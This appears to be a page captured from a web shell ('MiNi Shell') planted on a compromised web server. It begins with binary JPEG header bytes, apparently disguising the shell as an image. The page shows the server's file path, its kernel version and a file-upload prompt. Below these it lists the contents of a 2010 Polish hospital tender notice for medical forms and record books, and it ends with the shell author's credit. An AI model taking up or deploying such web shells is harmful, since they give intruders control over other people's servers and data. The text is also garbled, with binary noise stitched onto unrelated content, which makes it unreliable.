JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100506/111095-N-2010.html

<p class="kh_header"><b>Tarnów: Zakup i dostawa sukcesywna : skierowania analityczne, książki i druki medyczne oraz akcydensowe  przez okres 12 miesięcy od dnia podpisania umowy.</b><br>
<b>Numer ogłoszenia: 111095 - 2010; data zamieszczenia: 06.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. św. Łukasza SPZOZ , ul. Lwowska 178a, 33-100 Tarnów, woj. małopolskie, tel. 014 6315460, faks 014 6315460, 6212581.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lukasz.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sukcesywna : skierowania analityczne, książki i druki medyczne oraz akcydensowe  przez okres 12 miesięcy od dnia podpisania umowy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa sukcesywna : skierowania analityczne, książki i druki medyczne oraz akcydensowe  przez okres 12 miesięcy od dnia podpisania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.81.90.00-4, 22.90.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osoba podpisująca nie jest osoba upoważnioną na podstawie odpisu z Krajowego Rejestru Sadowego lub zaświadczenia o prowadzeniu działalności gospodarczej. Jeżeli dołączone do oferty ww. pełnomocnictwo będzie w formie kopii, Zamawiający wymaga, aby jego zgodność z oryginałem poświadczyła osoba wymieniona w rejestrze, która jest wskazana, jako upoważniona do reprezentowania Wykonawcy lub notariusz
2) oświadczenie w trybie art. 22 ust.1 ustawy PZP</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W trakcie trwania umowy możliwa jest zmiana cen tylko w przypadku zmiany: stawki VAT jednakże zmiana w tym zakresie obowiązują dopiero po podpisaniu aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lukasz.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SZPITAL WOJEWÓDZKI  IM. ŚW. ŁUKASZA W TARNOWIE SAMODZIELNYM PUBLICZNY ZAKŁADZIE OPIEKI ZDROWOTNEJ 33-100 TARNÓW, UL. LWOWSKA 178A (pawilon D II piętro) - Dział Logistyki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2010 godzina 10:00, miejsce: SZPITAL WOJEWÓDZKI IM. ŚW. ŁUKASZA W TARNOWIE SAMODZIELNYM PUBLICZNY ZAKŁADZIE OPIEKI ZDROWOTNEJ 33-100 TARNÓW, UL. LWOWSKA 178A (pawilon D II piętro) Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 12.06.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Skierowania analityczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. BADANIA OGÓLNE - format A-5, 2 500 bloczków
2. BADANIA CITO - format A-5, 2 300 bloczków
3. BADANIA KONTRAKTOWE - format A-5, 1 700 bloczków
4. BADANIA DIALIZY - format A-5,  400 bloczków
5. BADANIA PO EKSPOZYCJI - format A-5,  50  bloczków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.81.90.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ksiązki i druki medyczne oraz akcydensowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. KSIĘGA CHORYCH ODDZIAŁU - oprawa twarda, format: A4, zszywana po dłuższym boku, 100 kartek - 280 książek,
2. KSIĘGA ZABIEGÓW ODDZIAŁU - oprawa twarda, format: A4, zszywane po krótszym boku, 100 kartek - 330 książek,
3. KSIĘGA PORAD AMBULATORYJNYCH - twarda oprawa, format: A3, zszyty po krótszym boku, brzeg perforowany  80 kartek samo kopiujących się ( 80 oryginał + 80 kopia) - 350 książek ,
4. KSIĘGA GŁÓWNA ARCHIWUM - twarda oprawa jak Księgi Głównej Szpitala, format: A4, zszyte po krótszym boku, 150 kartek - 12 książek,
5. KARTA KONSULTACJI - druk samokopiujący, format: A4 - 730 bloczków po 100 sztuk.,
6. KSIĘGA RAPORTÓW LEKARSKICH - twarda oprawa, format: A4, zszyte po krótszym boku, 100 kartek - 580 książek,
7. KSIĘGA RAPORTÓW PIELĘGNIARSKICH - twarda oprawa, format: A4, zszywane po krótszym boku, 100 kartek - 760 książek,
8. KSIĘGA RAPORTÓW PIELĘGNIARSKICH DIALIZ - twarda oprawa, format: A4, zszywane po dłuższym boku, 100 kartek - 70 książek,
9. KSIĘGA PRACOWNI DIAGNOSTYCZNEJ - twarda oprawa jak Księgi Głównej Szpitala , format: A4, zszywana po krótszym boku 100 kartek - 400 książek,
10. KSIĘGA GŁÓWNA REJESTRACJI DO PORADNI - twarda oprawa, format: A4, 100 kartek - 25 książek
11. KSIĘGA REJESTRACJI DO PORADNI - twarda oprawa, format: A4, zszyte po dłuższym boku, 100 kartek - 150 książek,
12. KARTA GORĄCZKOWA - format: A4 dwustronny - 38.000 sztuk, obowiązkowo czerwona kreska.
13. KARTA GORĄCZKOWA NIEMOWLĘCA - format A4 dwustronny, obowiązkowo czerwona kreska - 5.000 sztuk,
14. KSIĘGA ODMÓW PRZYJĘĆ I PORAD UDZIELONYCH W SZPITALNYM ODDZIALE RATUNKOWYM - oprawa twarda, format: A3, 100 kartek - 30 książek,
15. KSIĘGA GŁÓWNA ZAKŁADU REHABILITACJI LECZNICZEJ - twarda oprawa jak Księga Główna Szpitala, format: A4, zszywane po dłuższym boku, 100 kartek - 12 książki,
16. KSIĘGA DZIAŁU W ZAKŁADZIE REHABILITACJI LECZNICZEJ - twarda oprawa, format: A4, zszyty po dłuższym boku,  100 kartek - 35 książek,
17. KSIĘGA GŁÓWNA SZPITALA - bardzo twarda oprawa, format: A3, zszywana po 16 kartek i dopiero klejona, 100 kartek - 55 książek,
18. KSIĘGA STERYLIZACJI - twarda oprawa, format: A4, 100 kartek - 300 książek, w tym 150 na przyjęcie i 150 na wydanie,
19. KSIĘGA STERYLIZACJI - twarda oprawa, format: A5, 100 kartek - 200 książek, w tym 100 na przyjęcie i 100 na wydanie, wskazany inny kolor oprawy,
20. KSIĘGA BADAŃ HISTOLOGICZNYCH ZAKŁADU PATOMORFOLOGII - twarda oprawa, format: A4, 190 kartek - 2 książki,
21. KSIĘGA BADAŃ CYTOLOGICZNYCH ZAKŁADU PATOMORFOLOGII - twarda oprawa, format: A4, 50 kartek - 2 książki,
22. KSIĘGA PRZYJĘĆ MATERIAŁU DO ZAKŁADU PATOMORFOLOGII - twarda oprawa, format: A4, 190 kartek - 2 książki,
23.  KSIĘGA REJESTRACJI BADAŃ CYTOLOGICZNYCH ZAKŁADU PATOMORFOLGII - twarda oprawa, format: A4, 50 kartek - 2 książki,
24.  KSIĘGA BADAŃ ŚRÓDOPERACYJNYCH ZAKŁADU PATOMORFOLOGII - twarda oprawa, format A4, 100 kartek - 2 książki,
25. KSIĘGA PROTOKOŁÓW OPERACYJNYCH ODDZIAŁU OKULISTYCZNEGO - twarda oprawa, format: A4, 100 kartek - 14 książek + 1.500 dwustronnie drukowanych protokołów, dokładnie pokrywających się z układem książek,
26. KSIĘGA PROTOKOŁÓW OPERACYJNYCH - twarda oprawa, format: A4, 100 kartek - 100 książek + 70.000 dwustronnie drukowanych protokołów, dokładnie pokrywających się z układem książek.
27. KSIĘGA PRACOWNI MEDYCYNY NUKLEARNEJ - twarda oprawa, format: A3, 70 kartek - 2 książki.
28.  KOLEJKA OCZEKUJĄCYCH NA ŚWIADCZENIA LECZNICTWA ZAMKNIETEGO - twarda oprawa, format: A4, 50 kartek - 40 książki.
29. KOLEJKA OCZEKUJĄCYCH NA ŚWIADCZENIA LECZNICTWA AMBULATORYJNEGO - twarda oprawa, format: A4, 50 kartek - 70 książek.
30.  KSIĘGA INIEKCJI - twarda oprawa, format: A4, 100 kartek - 1.200 książek,
31.  KSIĘGA ZGONÓW - twarda oprawa, format A4, zszywane po krótszym boku, 100 kartek - 25 książek,
32. KSIĘGA TRANSFUZJI - format A4 zszyty po krótszym boku, 50 kartek - 50 książek
33.  KARTA INFORMACYJNA ZAKŁADU REHABILITACJI LECZNICZEJ - druk samokopiujący się, format A5 - 50 bl.
34.  KARTA INFORMACYJNA ZAKŁADU REHABILITACJI LECZNICZEJ - REHABILITACJA SZPITALNA - format A5, kolor inny niż biały - 6.000 szt.
35.  DOKUMENTACJA PIELĘGNIARSKA PACJENTA - format A4 - 38.000 szt. 
36.  KARTA INDYWIDUALNEJ PIELĘGNACJI - format A4 - 16.000 szt.
37. KARTA INDYWIDUALNEJ PIELĘGNACJI I OBSERWACJI - format A4 + 0,5 A4 - 38.000 szt.
38.  WSKAZÓWKI PIELĘGNIARSKIE - format A4 - 6.000 szt.
39.  KARTA BILANSU PŁYNÓW - format A4 - 8.000 szt.
40.  KARTA CUKRZYCOWA - format A4 - 8.000 szt.
41.  SKALA GLASGOW - format A4 - 4.000 szt.
42.  KARTA ODLEŻYN - format A4 - 4.000 szt.
43.  KARTA POMIARU RR I TĘTNA - format A4 - 10.000 szt.
44.  KARTA OBSERWACJI PORODU - format A4 - 2.000 szt. 
45.  KSIĄŻKA PORAD UDZIELONYCH W PORADNI ORTOPEDYCZNEJ - twarda oprawa, format A4, 100 kartek - 5 książek,
46.  PRÓBA ZGODNOŚCI - format: 36 cm x 30 cm - 150 kartek  oprawa jak Księga Główna Szpitala  - 15 książek.
47. GRUPA KRWI - format: (wysokość) 24 cm x 27 cm (szerokość)- 130 kartek oprawa jak Księga Główna Szpitala, 10 wierszy na stronie nie licząc nagłówka. - 20 książek.
48.  PRZECIWCIAŁA - format A4 - 150 kartek oprawa jak Księga  Główna Szpitala  - 2 książki.
49. KSIĘGA PRZYCHODU I ROZCHODU KKCz  - format A4 80 kartek oprawa jak Księga Główna Szpitala - 8 książek.
50. KSIĘGA PRZYCHODU I ROZCHODU FFP - format A4 - 50 kartek oprawa jak Księga Główna Szpitala  - 2 książki.
51. ZAPOTRZEBOWANIE NA KREW I PREPARATY KRWIOPOCHODNE - format: 10,5 cm x 15 cm - 40.000 szt.
52. SKIEROWANIE NA PRÓBĘ ZGODNOŚCI KRWI - format: 10,5 cm x 15 cm - 20.000 szt.
53.  GRUPA KRWI -( kartonik o wym. 8,5 cm x 12 cm)- 15.000 szt.
54. KARTA STATYSTYCZNA DO KARTY ZGONU - 20 bloczków po 100 sztuk,
55.  KSIĄŻKI NARKOTYKÓW - format A4, zszyta po dłuższym boku przesznurowana w sposób uniemożliwiający usunięcie kartki, ponumerowane strony  od 1 do 100 - 20 książek,
56.  KSIĄŻKI OBROTU SPIRYTUSEM- format A4, strony numerowane od 1 do 100 zszyta po dłuższym boku - 10 książek
57.   KSIĄŻECZKA SZCZEPIEŃ - 1600 szt. - zgodnie z  rozporządzeniem Ministra Zdrowia z dnia 19.12.2002r. w sprawie wykazu obowiązkowych szczepień ochronnych oraz zasad przeprowadzania i dokumentacji szczepień ( Dz. U. Nr 237 poz. 2018).
58. KARTA UODPORNIENIA DLA NOWORODKA ( karton) format:  2/3 A4 - 2.000 szt.
59. ROZLICZENIE MATERIAŁU OPERACYJNEGO - format A4 dwustronny - 7.000 sztuk,
60. KARTA ZNIECZULENIA format: A4 - 20.000 szt.
61.  KONTROLA PROCESU STERYLIZACJI - Blok Operacyjny - format A4 - 7.000 sztuk,
62.  KARTA ZGŁOSZENIA NOWOTWORU ZŁOŚLIWEGO MZ/N-1a - format A4 dwustronny - 
63.  SKIEROWANIE DO PORADNI SPECJALISTYCZNEJ - format A4 - 20.000 szt
64.  INFORMACJA DLA LEKARZA KIERUJĄCEGO - format A5, samo kopiujące, zg z wymogami NFZ- 20.000 sztuk
65. SKIEROWANIE DO SZPITALA - format A4 - 10.000 sztuk,
66.  PROTOKÓŁ HEMODIALIZY - format A4 - dwustronny - 6.000 szt.,
67. KSIĘGA KONTROLI OBROTU ALKOHOLEM ETYLOWYM I JEGO SKAŻENIA - 3 książki format A4 zszyty po krótszym boku, twarda oprawa ( jedna książka 51 kartek, dwie po 26 kartek,
68. KSIĄŻKA DO FAKTUR - format A4 zszyty po krótszym boku, dwustronny, twarda oprawa, 100 kartek - 10 książek.
69. Książeczka chorego na jaskrę - 500 szt. - wg załączonego wzoru,
70. Karta znieczuleń - format A-4 samokopiujący - oryginał i kopia - szt.
71. Karta obserwacyjna po zabiegach operacyjnych - format A-4 samokopiujący - oryginał i kopia - szt.
72. Karta znieczuleń do krótkich zabiegów - format A-5 samokopiujący - oryginał i kopia - szt.
73. Książka zabiegowa Oddziału Anestezjologii - lekarze - format A-4 dwustronne, zszyte wzdłuż węższego boku, 100 kartek - szt. 2 
74. Książka zabiegowa Oddziału Anestezjologii - pielęgniarki - format A-4 dwustronne, zszyte wzdłuż węższego boku, 100 kartek - szt. 6 
75. Orzeczenie lekarskie z badania przeprowadzonego do celów sanitarno-epidemiologicznych  - 100 bloczków
76. Zaświadczenie lekarskie - 20 bloczków
77. Zaświadczenia lekarskie dla pracujących w warunkach narażenia na promieniowanie jonizujące - 50 bloczków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com